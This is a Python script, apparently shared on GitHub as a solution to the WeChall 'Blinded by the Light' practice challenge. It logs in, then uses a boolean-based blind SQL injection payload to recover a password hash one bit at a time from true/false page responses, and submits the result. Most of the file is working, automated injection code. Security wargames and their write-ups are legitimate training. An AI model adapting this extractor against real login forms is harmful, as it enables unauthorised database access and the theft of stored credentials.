-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathblinded_by_the_light.py
86 lines (75 loc) · 2.83 KB
/
blinded_by_the_light.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
#
# [Wecall.net] Blinded by the Light
# Solution by MakMan
# http://mukarramkhalid.com/solution-blinded-by-the-light/
# Requirements : Python 3.4.x or Higher, Requests Module
#
import re, os, sys, getpass
try:
import requests
except:
exit('[-] Importing Requests module failed')
class weChall:
'''http://www.wechall.net'''
loginUrl = 'http://www.wechall.net/login'
challUrl = 'http://www.wechall.net/challenge/blind_light/index.php'
def __init__(self, username, password):
self.login(username, password)
def login(self, username, password):
s = requests.Session()
r = s.get(self.loginUrl)
r = s.post(self.loginUrl, data = {'username' : username, 'password' : password, 'login' : 'Login'})
if 'Welcome back to WeChall' in r.text:
print('[+] Login Successful')
print('[+] Resetting attempt counter')
r = s.get(self.challUrl + '?reset=me')
c = r.request.headers['Cookie']
self.Cookie = c
else:
exit('[-] Login Failed')
class solveChall(weChall):
'''Extending weChall login class'''
trueStr = 'Welcome back, user.'
falseStr = 'Your password is wrong, user.'
def inject(self):
mySol = ''
print('[+] Solving [Wechall.net] Blinded by the Light')
for x in range(1, 33):
for y in range(1, 5):
payload = '\' or substr(lpad(conv(substr(password,' + str(x) + ',1),16,2),4,\'0\'),' + str(y) + ',1)-- -'
data = {'injection' : payload, 'inject' : 'Inject'}
try:
r = requests.post(self.challUrl, data = data, headers = {'Cookie' : self.Cookie }, timeout = 30)
except:
exit('[-] Please check your internet connection')
if self.trueStr in r.text:
attempt = re.search('You would now be logged in after (.+?) attempts', r.text).group(1)
mySol = mySol + '1'
elif self.falseStr in r.text:
attempt = re.search('This was your (.+?)\. attempt', r.text).group(1)
mySol = mySol + '0'
clear = os.system('cls' if os.name == 'nt' else 'clear')
print('[+] Attempts : ' + attempt)
print('[+] Solution : ' + hex(int(mySol,2))[2:])
print('\nPlease Wait .. ')
sys.stdout.flush()
print('[+] Done')
return hex(int(mySol,2))[2:]
def submitSolution(self, myHash):
r = requests.post(self.challUrl, data = {'thehash' : myHash, 'mybutton' : 'Enter'}, headers = {'Cookie' : self.Cookie }, timeout = 30)
if 'Your answer is correct' in r.text:
print('[+] Challenge completed successfully.')
else:
print('[-] Something went wrong. Please try again.')
def main():
u = input('Enter WeChall Username: ')
p = getpass.getpass('Enter WeChall Password: ')
a = solveChall(u, p)
solution = a.inject()
a.submitSolution(solution)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
exit('[-] CTRL-C detected.')
# End